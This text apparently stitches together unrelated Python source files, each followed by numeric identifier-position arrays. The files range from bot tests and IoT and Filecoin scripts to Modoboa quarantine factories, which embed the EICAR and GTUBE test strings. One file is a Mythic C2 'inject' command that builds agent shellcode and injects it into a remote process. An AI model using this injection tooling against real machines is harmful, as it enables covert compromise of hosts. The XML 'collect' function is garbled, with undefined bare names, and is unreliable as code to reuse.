def test_lock_unlock(commander, hook):
with commander.executest(hook, '!lock'):
hook.assert_success('Bot is now in ADMIN only mode')
# even basic commands are unauthorized
with commander.executest(hook, '!time', 'goodlikebot'):
hook.assert_silent_failure()
with commander.executest(hook, '!lock'):
hook.assert_success('Bot no longer in ADMIN only mode')
# functionality restored
with commander.executest(hook, '!time', 'goodlikebot'):
hook.assert_success()
def test_index(tl, hook):
with HTTMock(customsforge), Index(tl=tl).executest(hook):
hook.assert_success('CDLCs indexed')
tl.set_use_elastic(False)
with HTTMock(customsforge), Index(tl=tl).executest(hook):
hook.assert_failure('CDLCs could not be indexed')
def test_rank(users, hook):
with Rank(us=users).executest(hook, args=''):
hook.assert_failure('Try !rank RANK NICK')
with Rank(us=users).executest(hook, args='just_rank'):
hook.assert_failure('Try !rank RANK NICK')
with Rank(us=users).executest(hook, args='BAD_RANK goodlikebot'):
hook.assert_failure('BAD_RANK is not a valid rank')
with Rank(us=users).executest(hook, args='BAN goodlikebot'), users._manual('goodlikebot'):
hook.assert_success('goodlikebot is now BAN')
assert_that(users.rank('goodlikebot')).is_equal_to(UserRank.BAN)
users.set_use_elastic(False)
with Rank(us=users).executest(hook, args='ADMIN goodlikebot'):
hook.assert_failure('Rank could not be set')
def test_rank_shorthand(commander, hook):
with commander.executest(hook, '!ban goodlikebot'), commander._users._manual('goodlikebot'):
hook.assert_success('goodlikebot is now BAN')
assert_that(commander._users.rank('goodlikebot')).is_equal_to(UserRank.BAN)
| [
[
[
21,
32
],
[
1741,
1752
],
[
2164,
2175
]
],
[
[
53,
60
],
[
960,
967
],
[
1099,
1106
]
],
[
[
100,
105
],
[
983,
988
],
[
1122,
1127
]
],
[
[
107,
111
],
[
1249,
1253
],
[
1351,
1355
],
[
1462,
1466
],
[
1593,
1597
],
[
1850,
1854
]
],
[
[
150,
158
],
[
1792,
1800
],
[
2226,
2234
]
],
[
[
195,
207
],
[
968,
980
],
[
1107,
1119
]
],
[
[
214,
232
]
],
[
[
411,
427
]
],
[
[
929,
939
]
],
[
[
1216,
1225
]
],
[
[
1967,
1986
]
]
] |
import os
import base64
from simpleutil.utils import digestutils
from goperation.filemanager import LocalFile
from goperation.manager.rpc.agent.application.taskflow.middleware import EntityMiddleware
from goperation.manager.rpc.agent.application.taskflow.database import Database
from goperation.manager.rpc.agent.application.taskflow.application import AppUpgradeFile
from goperation.manager.rpc.agent.application.taskflow.application import AppLocalBackupFile
from gogamechen3.api import gfile
class GogameMiddle(EntityMiddleware):
def __init__(self, entity, endpoint, objtype):
super(GogameMiddle, self).__init__(entity, endpoint)
self.objtype = objtype
self.databases = {}
self.waiter = None
class GogameDatabase(Database):
def __init__(self, **kwargs):
super(GogameDatabase, self).__init__(**kwargs)
self.database_id = kwargs.get('database_id')
self.source = kwargs.get('source')
self.rosource = kwargs.get('rosource')
self.subtype = kwargs.get('subtype')
self.ro_user = kwargs.get('ro_user')
self.ro_passwd = kwargs.get('ro_passwd')
class GogameAppFile(AppUpgradeFile):
def __init__(self, source, objtype, revertable=False, rollback=False,
stream=None):
super(GogameAppFile, self).__init__(source, revertable, rollback)
self.objtype = objtype
self.stream = stream
def post_check(self):
gfile.check(self.objtype, self.file)
def clean(self):
if self.stream:
os.remove(self.file)
def prepare(self, middleware=None, timeout=None):
if self.stream:
if len(self.stream) > 5000:
raise ValueError("Strem over size")
file_path = os.path.join('/tmp', '%s.zip' % self.source)
data = base64.b64decode(self.stream)
if digestutils.strmd5(data) != self.source:
raise ValueError('Md5 not match')
with open(file_path, 'wb') as f:
data = base64.b64decode(self.stream)
f.write(data)
self.localfile = LocalFile(file_path, self.source, len(data))
else:
self.localfile = middleware.filemanager.get(self.source, download=True, timeout=timeout)
try:
self.post_check()
except Exception:
localfile = self.localfile
self.localfile = None
if self.stream:
os.remove(localfile.path)
else:
middleware.filemanager.delete(self.source)
raise
class GogameAppBackupFile(AppLocalBackupFile):
def __init__(self, destination, objtype):
super(GogameAppBackupFile, self).__init__(destination,
exclude=gfile.CompressConfAndLogExcluder(),
topdir=False,
native=True)
self.objtype = objtype
def post_check(self):
gfile.check(self.objtype, self.file)
| [
[
[
7,
9
],
[
1552,
1554
],
[
1768,
1770
],
[
2471,
2473
]
],
[
[
17,
23
],
[
1832,
1838
],
[
2036,
2042
]
],
[
[
54,
65
],
[
1877,
1888
]
],
[
[
102,
111
],
[
2125,
2134
]
],
[
[
185,
201
],
[
520,
536
]
],
[
[
273,
281
],
[
761,
769
]
],
[
[
356,
370
],
[
1165,
1179
]
],
[
[
445,
463
],
[
2620,
2638
]
],
[
[
493,
498
],
[
1457,
1462
],
[
2809,
2814
],
[
3038,
3043
]
],
[
[
507,
519
],
[
605,
617
]
],
[
[
746,
760
],
[
820,
834
]
],
[
[
1151,
1164
],
[
1302,
1315
]
],
[
[
2600,
2619
],
[
2702,
2721
]
]
] |
#!/usr/bin/env python3
# XML API, for dealing with XML strings
# -*- coding: utf-8 -*-
__all__ = ['parseargs', 'collect']
'<users>\n\t<user>\n\t\t<id>1</id>\n\t\t<name>Fred</name>\n\t\t<salary>500000</salary>\n\t</user>\n\t<user>\n\t\t<id>1</id>\n\t\t<name>ScienceCat</name>\n\t\t<salary>500000</salary>\n\t</user>\n\t<user>\n\t\t<id>1</id>\n\t\t<name>Bob</name>\n\t\t<salary>500000</salary>\n\t</user>\n</users>'
xmlex = '<users>\n<user>\n<id>1</id>\n<name>Fred</name>\n<salary>500000</salary>\n</user>\n<user>\n<id>1</id>\n<name>ScienceCat</name>\n<salary>500000</salary>\n</user>\n<user>\n<id>1</id>\n<name>Bob</name>\n<salary>500000</salary>\n</user>\n</users>'
argex = 'cats="True and Sand" true=\'Cats two\' sand="graval"'
##import re
##import xml.etree.cElementTree as xml
def parseargs(string:str):
"""Split a given string into individual arguments, seperated into key:arg for <key>=(' or ")<arg>(same char as start)"""
arg = {}
# ([%-%w]+)=([\"'])(.-)%2
# '([\w]+)=([\"\'])(.*)'
# '([-\w]+)=([\"\']*)'
## pattern = re.compile('([\w]+)=([\"\'])(.*)')
## print(pattern)
## for match in re.findall(pattern, string):
## print(match)
parts = string.split(' ')
bkey = ''
buffer = ''
end = '"'
for part in parts:
if '=' in part:
key, vp = part.split('=')
if vp[0] in ('"', "'"):
end = vp[0]
if vp.endswith(end):
arg[key] = vp[1:-1]
else:
bkey = key
buffer += vp
elif part.endswith(end):
buffer += ' '+part
arg[bkey] = buffer[1:-1]
bkey, buffer = '', ''
else:
buffer += ' '+part
return arg
def collect(string:str):
stack = []
top = []
stack.append(top)
i, j = 0, 0
class elementTag:
def __init__(self, label, xargs, empty=0):
self.label = label
self.xargs = xargs
self.empty = empty
while True:
ni
h
c
lable
xarg
emtpy
if not ni:
break
text = string[i:ni-1]
if not text.find('^ '):
top.append(text)
if empty == '/':# empty element tag
top.append(elementTag(label, parseargs(xarg), 1))
elif c == '': # start tag
top = [elementTag(label, parseargs(xarg))]
stack.append(top)
else:
toclose = stack
if len(stack) < 1:
error(f'Nothing to close with {label}.')
elif toclose.label == label:
pass
| [
[
[
88,
95
]
],
[
[
416,
421
]
],
[
[
668,
673
]
],
[
[
788,
797
],
[
2303,
2312
],
[
2395,
2404
]
],
[
[
1749,
1756
]
]
] |
import json
import logging
from sqlalchemy import Column, Integer, String, Float, DateTime, Boolean, func
from iotfunctions import bif
from ai.functions import SimpleAnomaly
from iotfunctions.metadata import EntityType
from iotfunctions.db import Database
from iotfunctions.enginelog import EngineLogging
from custom import settings
EngineLogging.configure_console_logging(logging.DEBUG)
'''
# Replace with a credentials dictionary or provide a credentials
# Explore > Usage > Watson IOT Platform Analytics > Copy to clipboard
# Past contents in a json file.
'''
#with open('credentials_Monitor-Demo.json', encoding='utf-8') as F:
#with open('credentials.json', encoding='utf-8') as F:
with open('credentials_dev2.json', encoding='utf-8') as F:
credentials = json.loads(F.read())
'''
Developing Test Pipelines
-------------------------
When creating a set of functions you can test how they these functions will
work together by creating a test pipeline.
'''
'''
Create a database object to access Watson IOT Platform Analytics DB.
'''
db = Database(credentials = credentials)
db_schema = None # set if you are not using the default
'''
To do anything with IoT Platform Analytics, you will need one or more entity type.
You can create entity types through the IoT Platform or using the python API as shown below.
The database schema is only needed if you are not using the default schema. You can also rename the timestamp.
'''
entity_name = 'Turbines'
# dash100462 Used in dev2
db_schema = 'dash100462'
# db_schema = None # replace if you are not using the default schema
db.drop_table(entity_name, schema = db_schema)
entity = EntityType(entity_name,db,
Column('TURBINE_ID',String(50)),
Column('TEMPERATURE',Float()),
Column('PRESSURE',Float()),
Column('VOLUME', Float()),
SimpleAnomaly(request='GET',
url='internal_test',
output_item = 'http_preload_done'),
bif.PythonExpression(expression='df["TEMPERATURE"]*df["PRESSURE"]',
output_name = 'VOLUME'),
**{
'_timestamp' : 'evt_timestamp',
'_db_schema' : db_schema
})
'''
When creating an EntityType object you will need to specify the name of the entity, the database
object that will contain entity data
After creating an EntityType you will need to register it so that it visible in the UI.
To also register the functions and constants associated with the entity type, specify
'publish_kpis' = True.
'''
entity.register(raise_error=False)
db.register_functions([SimpleAnomaly])
'''
To test the execution of kpi calculations defined for the entity type locally
use 'test_local_pipeline'.
A local test will not update the server job log or write kpi data to the AS data
lake. Instead kpi data is written to the local filesystem in csv form.
'''
entity.exec_local_pipeline()
'''
view entity data
'''
df = db.read_table(table_name=entity_name, schema=db_schema)
print(df.head())
| [
[
[
7,
11
],
[
765,
769
]
],
[
[
19,
26
],
[
374,
381
]
],
[
[
50,
56
],
[
1690,
1696
],
[
1743,
1749
],
[
1794,
1800
],
[
1842,
1848
]
],
[
[
58,
65
]
],
[
[
67,
73
],
[
1710,
1716
]
],
[
[
75,
80
],
[
1764,
1769
],
[
1812,
1817
],
[
1859,
1864
]
],
[
[
82,
90
]
],
[
[
92,
99
]
],
[
[
101,
105
]
],
[
[
131,
134
],
[
2067,
2070
]
],
[
[
160,
173
],
[
1889,
1902
],
[
2748,
2761
]
],
[
[
208,
218
],
[
1643,
1653
]
],
[
[
247,
255
],
[
1050,
1058
]
],
[
[
291,
304
],
[
334,
347
]
],
[
[
324,
332
]
],
[
[
744,
745
],
[
776,
777
]
],
[
[
751,
762
],
[
1073,
1084
]
],
[
[
1045,
1047
],
[
1586,
1588
],
[
1666,
1668
],
[
2725,
2727
],
[
3092,
3094
]
],
[
[
1086,
1095
]
],
[
[
1439,
1450
],
[
1600,
1611
],
[
1654,
1665
],
[
3117,
3128
]
],
[
[
1491,
1500
],
[
1622,
1631
],
[
2316,
2325
],
[
3137,
3146
]
],
[
[
1634,
1640
],
[
2690,
2696
],
[
3031,
3037
]
],
[
[
3087,
3089
],
[
3154,
3156
]
]
] |
# -*- coding: utf-8 -*-
"""Amavis factories."""
from __future__ import unicode_literals
import datetime
import time
import factory
from . import models
from .utils import smart_bytes
SPAM_BODY = """X-Envelope-To: <{rcpt}>
X-Envelope-To-Blocked: <{rcpt}>
X-Quarantine-ID: <nq6ekd4wtXZg>
X-Spam-Flag: YES
X-Spam-Score: 1000.985
X-Spam-Level: ****************************************************************
X-Spam-Status: Yes, score=1000.985 tag=2 tag2=6.31 kill=6.31
tests=[ALL_TRUSTED=-1, GTUBE=1000, PYZOR_CHECK=1.985]
autolearn=no autolearn_force=no
Received: from demo.modoboa.org ([127.0.0.1])
by localhost (demo.modoboa.org [127.0.0.1]) (amavisd-new, port 10024)
with ESMTP id nq6ekd4wtXZg for <user@demo.local>;
Thu, 9 Nov 2017 15:59:52 +0100 (CET)
Received: from demo.modoboa.org (localhost [127.0.0.1])
by demo.modoboa.org (Postfix) with ESMTP
for <user@demo.local>; Thu, 9 Nov 2017 15:59:52 +0100 (CET)
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: base64
Subject: Sample message
From: {sender}
To: {rcpt}
Message-ID: <151023959268.5550.5713670714483771838@demo.modoboa.org>
Date: Thu, 09 Nov 2017 15:59:52 +0100
This is the GTUBE, the
Generic
Test for
Unsolicited
Bulk
Email
If your spam filter supports it, the GTUBE provides a test by which you
can verify that the filter is installed correctly and is detecting incoming
spam. You can send yourself a test mail containing the following string of
characters (in upper case and with no white spaces and line breaks):
XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X
You should send this test mail from an account outside of your network.
"""
VIRUS_BODY = """Subject: Virus Test Message (EICAR)
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="huq684BweRXVnRxX"
Content-Disposition: inline
Date: Sun, 06 Nov 2011 10:08:18 -0800
--huq684BweRXVnRxX
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
This is a virus test message. It contains an attached file 'eicar.com',
which contains the EICAR virus <http://eicar.org/86-0-Intended-use.html>
test pattern.
--huq684BweRXVnRxX
Content-Type: application/x-msdos-program
Content-Disposition: attachment; filename="eicar.com"
Content-Transfer-Encoding: quoted-printable
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*=0A
--huq684BweRXVnRxX--
"""
class MaddrFactory(factory.django.DjangoModelFactory):
"""Factory for Maddr."""
class Meta:
model = models.Maddr
django_get_or_create = ("email", )
id = factory.Sequence(lambda n: n) # NOQA:A003
email = factory.Sequence(lambda n: "user_{}@domain.test".format(n))
domain = "test.domain"
class MsgsFactory(factory.django.DjangoModelFactory):
"""Factory for Mailaddr."""
class Meta:
model = models.Msgs
mail_id = factory.Sequence(lambda n: "mailid{}".format(n))
secret_id = factory.Sequence(lambda n: smart_bytes("id{}".format(n)))
sid = factory.SubFactory(MaddrFactory)
client_addr = "127.0.0.1"
originating = "Y"
dsn_sent = "N"
subject = factory.Sequence(lambda n: "Test message {}".format(n))
time_num = factory.LazyAttribute(lambda o: int(time.time()))
time_iso = factory.LazyAttribute(
lambda o: datetime.datetime.fromtimestamp(o.time_num).isoformat())
size = 100
class MsgrcptFactory(factory.django.DjangoModelFactory):
"""Factory for Msgrcpt."""
class Meta:
model = models.Msgrcpt
rseqnum = 1
is_local = "Y"
bl = "N"
wl = "N"
mail = factory.SubFactory(MsgsFactory)
rid = factory.SubFactory(MaddrFactory)
class QuarantineFactory(factory.django.DjangoModelFactory):
"""Factory for Quarantine."""
class Meta:
model = models.Quarantine
chunk_ind = 1
mail = factory.SubFactory(MsgsFactory)
def create_quarantined_msg(rcpt, sender, rs, body, **kwargs):
"""Create a quarantined msg."""
msgrcpt = MsgrcptFactory(
rs=rs,
rid__email=rcpt,
rid__domain="com.test", # FIXME
mail__sid__email=smart_bytes(sender),
mail__sid__domain="", # FIXME
**kwargs
)
QuarantineFactory(
mail=msgrcpt.mail,
mail_text=smart_bytes(SPAM_BODY.format(rcpt=rcpt, sender=sender))
)
return msgrcpt
def create_spam(rcpt, sender="spam@evil.corp", rs=" "):
"""Create a spam."""
body = SPAM_BODY.format(rcpt=rcpt, sender=sender)
body += "fóó bár"
return create_quarantined_msg(
rcpt, sender, rs, body, bspam_level=999.0, content="S")
def create_virus(rcpt, sender="virus@evil.corp", rs=" "):
"""Create a virus."""
return create_quarantined_msg(rcpt, sender, rs, VIRUS_BODY, content="V")
| [
[
[
73,
89
]
],
[
[
98,
106
],
[
3354,
3362
]
],
[
[
114,
118
],
[
3284,
3288
]
],
[
[
127,
134
],
[
2472,
2479
],
[
2636,
2643
],
[
2691,
2698
],
[
2798,
2805
],
[
2926,
2933
],
[
2991,
2998
],
[
3059,
3066
],
[
3177,
3184
],
[
3248,
3255
],
[
3313,
3320
],
[
3449,
3456
],
[
3637,
3644
],
[
3679,
3686
],
[
3738,
3745
],
[
3889,
3896
]
],
[
[
150,
156
],
[
2570,
2576
],
[
2899,
2905
],
[
3549,
3555
],
[
3841,
3847
]
],
[
[
176,
187
],
[
3018,
3029
],
[
4157,
4168
],
[
4308,
4319
]
],
[
[
189,
198
],
[
4320,
4329
],
[
4483,
4492
]
],
[
[
1744,
1754
],
[
4785,
4795
]
],
[
[
2459,
2471
],
[
3078,
3090
],
[
3698,
3710
]
],
[
[
2786,
2797
],
[
3656,
3667
],
[
3908,
3919
]
],
[
[
3434,
3448
],
[
4035,
4049
]
],
[
[
3720,
3737
],
[
4244,
4261
]
],
[
[
3927,
3949
],
[
4559,
4581
],
[
4744,
4766
]
],
[
[
4395,
4406
]
],
[
[
4653,
4665
]
]
] |
#!/usr/bin/env python
from __future__ import print_function, division
import os, sys
import matplotlib.pyplot as plt
import numpy as np
import argparse
from astropy import log
from os import path
from glob import glob
from subprocess import check_call
import shutil
from astropy.table import Table
from astropy.io import fits
from nicer.values import *
from nicer.plotutils import plot_light_curve
def runcmd(cmd):
# CMD should be a list of strings since it is not processed by a shell
log.info('CMD: '+" ".join(cmd))
os.system(" ".join(cmd))
## Some ftools calls don't work properly with check_call...not sure why!
## so I am using os.system instead of check_call
#check_call(cmd,env=os.environ)
################################################
# Checking the presence of HEASOFT
try:
check_call('nicerversion',env=os.environ)
except:
print("You need to initialize FTOOLS/HEASOFT first (e.g., type 'heainit')!", file=sys.stderr)
exit()
################################################
# Checking the presence of gti header and columns in data/
gticolumns = path.join(datadir,'gti_columns.txt')
gtiheader = path.join(datadir,'gti_header.txt')
if not os.path.isfile(gtiheader) or not os.path.isfile(gticolumns):
log.error('The files gti_header.txt or gti_columns.txt are missing. Check the {} directory'.format(os.path.abspath(datadir)))
exit()
desc = """
Create a simple GTI file from a pair of NICER METs. This is handy as an input file to niextract-events timefile=xxx.gti
"""
parser = argparse.ArgumentParser(description = desc)
parser.add_argument("startmet", help="Starting MET for GTI", type=float)
parser.add_argument("stopmet", help="Ending MET for GTI", type=float)
parser.add_argument("--gtiname", help="Name of output GTI FITS file (default gti.fits)", default="gti.fits")
args = parser.parse_args()
################################################
## STEP 5 - dumping the TSTART and TEND into text file
import tempfile
fp = tempfile.NamedTemporaryFile()
fp.write('{0} {1}\n'.format(args.startmet,args.stopmet))
fp.flush()
################################################
## STEP 6 - Making the GTI file from the text file
log.info("Making the GTI file gti.fits from the GTI data textfile")
cmd = ['ftcreate', '{}'.format(gticolumns), fp.name, args.gtiname, 'headfile={}'.format(gtiheader), 'extname="GTI"', 'clobber=yes']
runcmd(cmd)
fp.close()
| [
[
[
45,
59
]
],
[
[
61,
69
]
],
[
[
77,
79
],
[
847,
849
],
[
1191,
1193
],
[
1224,
1226
],
[
1356,
1358
],
[
532,
534
]
],
[
[
81,
84
],
[
953,
956
]
],
[
[
92,
116
]
],
[
[
124,
135
]
],
[
[
143,
151
],
[
1540,
1548
]
],
[
[
172,
175
],
[
1256,
1259
],
[
2190,
2193
],
[
496,
499
]
],
[
[
191,
195
],
[
1098,
1102
],
[
1147,
1151
]
],
[
[
213,
217
]
],
[
[
241,
251
],
[
817,
827
]
],
[
[
259,
265
]
],
[
[
292,
297
]
],
[
[
321,
325
]
],
[
[
352,
353
],
[
1108,
1115
],
[
1157,
1164
],
[
1372,
1379
]
],
[
[
382,
398
]
],
[
[
404,
410
],
[
2390,
2396
]
],
[
[
1085,
1095
],
[
1239,
1249
],
[
2289,
2299
]
],
[
[
1135,
1144
],
[
1206,
1215
],
[
2346,
2355
]
],
[
[
1396,
1400
],
[
1578,
1582
]
],
[
[
1531,
1537
],
[
1584,
1590
],
[
1657,
1663
],
[
1727,
1733
],
[
1844,
1850
]
],
[
[
1837,
1841
],
[
2048,
2052
],
[
2062,
2066
],
[
2311,
2315
]
],
[
[
1976,
1984
],
[
1990,
1998
]
],
[
[
1985,
1987
],
[
2020,
2022
],
[
2077,
2079
],
[
2302,
2304
],
[
2403,
2405
]
],
[
[
2258,
2261
],
[
2397,
2400
]
]
] |
import os
from datetime import datetime
from flask import Flask, render_template, flash, safe_join, send_file
from flask_user import login_required, current_user
from werkzeug.utils import secure_filename
from pygate_grpc.client import PowerGateClient
from deplatformr.models.filecoin_models import Ffs, Files, Logs
from deplatformr import app, db
@app.route('/filecoin-files')
@login_required
def filecoin_files():
files = Files.query.filter_by(user_id=current_user.id).all()
return render_template("filecoin/filecoin-files.html", files=files, breadcrumb="Filecoin / Files")
@app.route("/filecoin-download/<cid>", methods=["GET"])
@login_required
def filecoin_download(cid):
"""
Retrieve a file from Filecoin via IPFS using Powergate and offer the user
the option to save it to their machine.
"""
# Retrieve File and FFS info using the CID
file = Files.query.filter_by(CID=cid, user_id=current_user.id).first()
ffs = Ffs.query.get(file.ffs_id)
try:
# Retrieve data from Filecoin
powergate = PowerGateClient(app.config["POWERGATE_ADDRESS"])
data_ = powergate.ffs.get(file.CID, ffs.token)
# Save the downloaded data as a file
# Use the user data directory configured for the app
user_data = app.config["USER_DATA_DIR"]
if not os.path.exists(user_data):
os.makedirs(user_data)
print(user_data)
# Create a subdirectory per username. Usernames are unique.
user_dir = os.path.join(
user_data, str(current_user.id) + "-" + current_user.username)
if not os.path.exists(user_dir):
os.makedirs(user_dir)
print(user_dir)
# Create a Filecoin downloads subdirectory.
filecoin_dir = os.path.join(user_dir, "filecoin/downloads")
if not os.path.exists(filecoin_dir):
os.makedirs(filecoin_dir)
print(filecoin_dir)
with open(os.path.join(filecoin_dir, file.file_name), "wb") as out_file:
# Iterate over the data byte chunks and save them to an output file
for data in data_:
out_file.write(data)
# Create path to download file
safe_path = safe_join("../" + filecoin_dir, file.file_name)
print(safe_path)
# Offer the file for download to local machine
return send_file(safe_path, as_attachment=True)
# TODO: CLEAR CACHED FILES IN DOWNLOAD DIRECTORY
except Exception as e:
# Output error message if download from Filecoin fails
flash("failed to download '{}' from Filecoin. {}".format(
file.file_name, e), "alert-danger")
# Update log table with error
event = Logs(
timestamp=datetime.now().replace(microsecond=0),
event="Download ERROR: "
+ file.file_name
+ " CID: "
+ file.CID
+ " "
+ str(e),
user_id=current_user.id,
)
db.session.add(event)
db.session.commit()
files = Files.query.filter_by(user_id=current_user.id).all()
return render_template("filecoin/filecoin-files.html", files=files, breadcrumb="Filecoin / Files")
@ app.route('/filecoin-wallets')
@ login_required
def filecoin_wallets():
"""
Retrieve all wallets from all FFSes and save them in a list for
presentation on the UI template
"""
powergate = PowerGateClient(app.config["POWERGATE_ADDRESS"])
try:
ffs = Ffs.query.filter_by(user_id=current_user.id).one()
except:
flash("No wallets created yet.", "alert-danger")
return render_template("filecoin/filecoin-wallets.html", wallets=None, breadcrumb="Filecoin / Wallets")
wallets = []
addresses = powergate.ffs.addrs_list(ffs.token)
for address in addresses.addrs:
balance = powergate.wallet.balance(address.addr)
wallets.append(
{
"ffs": ffs.ffs_id,
"name": address.name,
"address": address.addr,
"type": address.type,
"balance": str(balance.balance),
}
)
return render_template("filecoin/filecoin-wallets.html", wallets=wallets, breadcrumb="Filecoin / Wallets")
| [
[
[
7,
9
],
[
1330,
1332
],
[
1369,
1371
],
[
1505,
1507
],
[
1609,
1611
],
[
1647,
1649
],
[
1768,
1770
],
[
1828,
1830
],
[
1870,
1872
],
[
1942,
1944
]
],
[
[
31,
39
],
[
2744,
2752
]
],
[
[
58,
63
]
],
[
[
65,
80
],
[
496,
511
],
[
3118,
3133
],
[
3631,
3646
],
[
4168,
4183
]
],
[
[
82,
87
],
[
2555,
2560
],
[
3567,
3572
]
],
[
[
89,
98
],
[
2213,
2222
]
],
[
[
100,
109
],
[
2357,
2366
]
],
[
[
133,
147
],
[
381,
395
],
[
647,
661
],
[
3247,
3261
]
],
[
[
149,
161
],
[
461,
473
],
[
926,
938
],
[
1546,
1558
],
[
1571,
1583
],
[
2955,
2967
],
[
3083,
3095
],
[
3524,
3536
]
],
[
[
189,
204
]
],
[
[
236,
251
],
[
1056,
1071
],
[
3423,
3438
]
],
[
[
299,
302
],
[
961,
964
],
[
3496,
3499
]
],
[
[
304,
309
],
[
431,
436
],
[
887,
892
],
[
3053,
3058
]
],
[
[
311,
315
],
[
2716,
2720
]
],
[
[
340,
343
],
[
351,
354
],
[
591,
594
],
[
3214,
3217
],
[
1072,
1075
],
[
1287,
1290
],
[
3439,
3442
]
],
[
[
345,
347
],
[
2990,
2992
],
[
3020,
3022
]
],
[
[
400,
414
]
],
[
[
666,
683
]
],
[
[
3266,
3282
]
]
] |
from setuptools import find_packages, setup
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='msnexport',
version='0.1',
license="MIT",
classifiers=["Programming Language :: Python :: 3.7"],
author='Charles Marceau',
author_email='charlesmarceau3@gmail.com',
description='Export your old xml MSN history to pdf.',
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/charles-marceau/msnexport',
packages=find_packages(),
include_package_data=True,
install_requires=[
'beautifulsoup4',
'click',
'lxml',
'reportlab'
],
entry_points='''
[console_scripts]
msnexport=msnexport.cli:export
'''
)
| [
[
[
23,
36
],
[
534,
547
]
],
[
[
38,
43
],
[
114,
119
]
],
[
[
76,
78
],
[
103,
105
]
],
[
[
84,
100
],
[
396,
412
]
]
] |
from mythic_payloadtype_container.MythicCommandBase import *
import json
from mythic_payloadtype_container.MythicRPC import *
import base64
class InjectArguments(TaskArguments):
def __init__(self, command_line):
super().__init__(command_line)
self.args = {
"template": CommandParameter(name="Payload Template", type=ParameterType.Payload, supported_agents=["apollo"], supported_agent_build_parameters={"apollo": {"output_type": "Shellcode"}}),
"pid": CommandParameter(name="PID", type=ParameterType.Number),
}
errorMsg = "Missing required parameter: {}"
async def parse_arguments(self):
if (self.command_line[0] != "{"):
raise Exception("Inject requires JSON parameters and not raw command line.")
self.load_args_from_json_string(self.command_line)
class InjectCommand(CommandBase):
cmd = "inject"
needs_admin = False
help_cmd = "inject (modal popup)"
description = "Inject agent shellcode into a remote process."
version = 2
is_exit = False
is_file_browse = False
is_process_list = False
is_download_file = False
is_upload_file = False
is_remove_file = False
script_only = True
author = "@djhohnstein"
argument_class = InjectArguments
attackmapping = ["T1055"]
async def shinject_completed(self, task: MythicTask, subtask: dict = None, subtask_group_name: str = None) -> MythicTask:
task.status = MythicStatus.Completed
return task
async def create_tasking(self, task: MythicTask) -> MythicTask:
temp = await MythicRPC().execute("get_payload",
payload_uuid=task.args.get_arg("template"))
gen_resp = await MythicRPC().execute("create_payload_from_uuid",
task_id=task.id,
payload_uuid=task.args.get_arg('template'),
new_description="{}'s injection into PID {}".format(task.operator, str(task.args.get_arg("pid"))))
if gen_resp.status == MythicStatus.Success:
# we know a payload is building, now we want it
while True:
resp = await MythicRPC().execute("get_payload",
payload_uuid=gen_resp.response["uuid"],
get_contents=True)
if resp.status == MythicStatus.Success:
if resp.response["build_phase"] == 'success':
b64contents = resp.response["contents"]
pe = base64.b64decode(b64contents)
if len(pe) > 1 and pe[:2] == b"\x4d\x5a":
raise Exception("Inject requires a payload of Raw output, but got an executable.")
# it's done, so we can register a file for it
task.display_params = "payload '{}' into PID {}".format(temp.response["tag"], task.args.get_arg("pid"))
response = await MythicRPC().execute("create_subtask", parent_task_id=task.id,
command="shinject", params_dict={"PID": task.args.get_arg("pid"), "Shellcode File ID": resp.response["file"]["agent_file_id"]},
subtask_callback_function="shinject_completed")
task.status = MythicStatus.Processed
break
elif resp.response["build_phase"] == 'error':
raise Exception("Failed to build new payload: " + resp.response["error_message"])
else:
await asyncio.sleep(1)
else:
raise Exception("Failed to build payload from template {}".format(task.args.get_arg("template")))
return task
async def process_response(self, response: AgentResponse):
pass
| [
[
[
59,
60
]
],
[
[
68,
72
]
],
[
[
124,
125
],
[
163,
176
],
[
863,
874
],
[
303,
319
],
[
350,
363
],
[
497,
513
],
[
531,
544
],
[
1432,
1442
],
[
1363,
1373
],
[
1466,
1478
],
[
1566,
1576
],
[
1551,
1561
],
[
1599,
1608
],
[
1744,
1753
],
[
2117,
2129
],
[
2252,
2261
],
[
2479,
2491
],
[
3106,
3115
],
[
3464,
3476
],
[
3745,
3752
],
[
3954,
3967
]
],
[
[
133,
139
],
[
2660,
2666
]
],
[
[
147,
162
],
[
1270,
1285
]
],
[
[
849,
862
]
]
] |
import numpy as np
from .base import Price
class GBM(Price):
"""Brownian motion."""
def __init__(self, T=1., sigma1=0.02, sigma2=0.01, s1=1., s2=1.,
drift1=0., drift2=0., n=100):
self.sigma1 = sigma1
self.sigma2 = sigma2
self.drift1 = drift1
self.drift2 = drift2
self.n = n
self.s1 = s1
self.s2 = s2
self.T = T
def generate(self):
dt1 = self.sigma1 ** 2 * self.T / self.n
dt2 = self.sigma2 ** 2 * self.T / self.n
bm1 = np.r_[[0.], np.sqrt(dt1) * np.random.randn(self.n - 1).cumsum()]
bm2 = np.r_[[0.], np.sqrt(dt2) * np.random.randn(self.n - 1).cumsum()]
path = np.c_[np.linspace(0, self.T, self.n), bm1, bm2]
path[:, 1] = np.exp((self.drift1 - self.sigma1 ** 2 / 2.) * path[:, 0] + self.sigma1 * path[:, 1])
path[:, 2] = np.exp((self.drift2 - self.sigma2 ** 2 / 2.) * path[:, 0] + self.sigma2 * path[:, 2])
path[:, 1] *= self.s1
path[:, 2] *= self.s2
return path
| [
[
[
7,
18
],
[
540,
542
],
[
552,
554
],
[
567,
569
],
[
619,
621
],
[
631,
633
],
[
646,
648
],
[
700,
702
],
[
706,
708
],
[
769,
771
],
[
876,
878
]
],
[
[
37,
42
],
[
54,
59
]
],
[
[
50,
53
]
]
] |
import json
import os, errno
import sys
import time
import shutil
import subprocess
from subprocess import Popen, PIPE
EXECUTABLE = 'hcbr_learning'
BUILD_FOLDER = '../build'
DATA_FOLDER = '../data'
KFOLD_SCRIPT = 'kfold_validation.py'
ACCURACY_ROW = 4
#METAOPTIMIZATION = '../tuning/hyperopt_wrapper.py'
#METAOPTIMIZATION_TIMEOUT = 60
METAOPTIMIZATION = '../script/genetic_algorithm.py'
def convert_paramILS_to_HCBR_params(paramILS):
convert_map = {
'e': 'eta',
'd': 'delta',
'g': 'gamma',
'i': 'online',
'p': 'learning_phases',
